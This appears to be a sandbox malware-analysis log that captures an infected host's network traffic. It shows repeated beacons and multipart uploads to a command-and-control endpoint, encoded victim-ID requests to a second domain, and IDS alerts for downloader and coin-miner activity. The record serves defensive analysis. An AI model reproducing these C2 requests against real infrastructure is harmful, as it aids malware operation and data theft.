Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA2NjI3Host: 185.215.113.19Content-Length: 106779Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwNjE1Host: 185.215.113.19Content-Length: 100767Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAxMjY0Host: 185.215.113.19Content-Length: 101416Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAzMTk1Host: 185.215.113.19Content-Length: 103347Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAxMjY0Host: 185.215.113.19Content-Length: 101416Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAxMjY0Host: 185.215.113.19Content-Length: 101416Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAwMDQ0Host: 185.215.113.19Content-Length: 100196Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODgyNTk=Host: 185.215.113.19Content-Length: 88411Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA2NjI3Host: 185.215.113.19Content-Length: 106779Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 36 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52767FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.21.16 104.21.21.16
Source: Joe Sandbox View	IP Address: 185.215.113.19 185.215.113.19
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49751 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49765 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49776 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49777 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49780 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49781 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49789 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49795 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49796 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49805 -> 185.216.214.225:80
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49835 -> 161.35.34.195:3333
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 172.67.143.156:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 104.21.21.16:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49746 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49772 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49841 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9ADE HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9ADF HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD1 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD1 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD0 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD0 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=3eu6r7le0jt84oo5tm651eouht
Source: global traffic	HTTP traffic detected: GET /socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 HTTP/1.1User-Agent: Mozilla/5.0(OpiumG4ng Win32)Host: fusionflow-meta.netCache-Control: no-cacheCookie: PHPSESSID=k7gfavf0krlu03ip8kaihg6kqn
